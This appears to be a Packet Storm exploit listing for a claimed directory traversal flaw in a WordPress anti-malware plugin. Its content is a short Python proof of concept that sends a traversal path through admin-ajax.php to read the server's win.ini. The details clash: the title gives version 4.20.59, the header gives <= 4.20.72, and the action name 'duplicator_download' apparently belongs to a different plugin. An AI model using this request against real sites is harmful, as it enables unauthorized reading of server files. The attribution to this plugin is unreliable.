WordPress Anti-Malware Security And Bruteforce Firewall 4.20.59 Directory Traversal

WordPress Anti-Malware Security and Bruteforce Firewall plugin version 4.20.59 suffers from a directory traversal vulnerability.

MD5 | 6f9edaf13c8046960529a3c19bdf3c96

Download

# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal
# Date: 05.07.2021
# Exploit Author: TheSmuggler
# Vendor Homepage: https://gotmls.net/
# Software Link: https://gotmls.net/downloads/
# Version: <= 4.20.72
# Tested on: Windows

import requests

print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)
            

Source: packetstormsecurity.com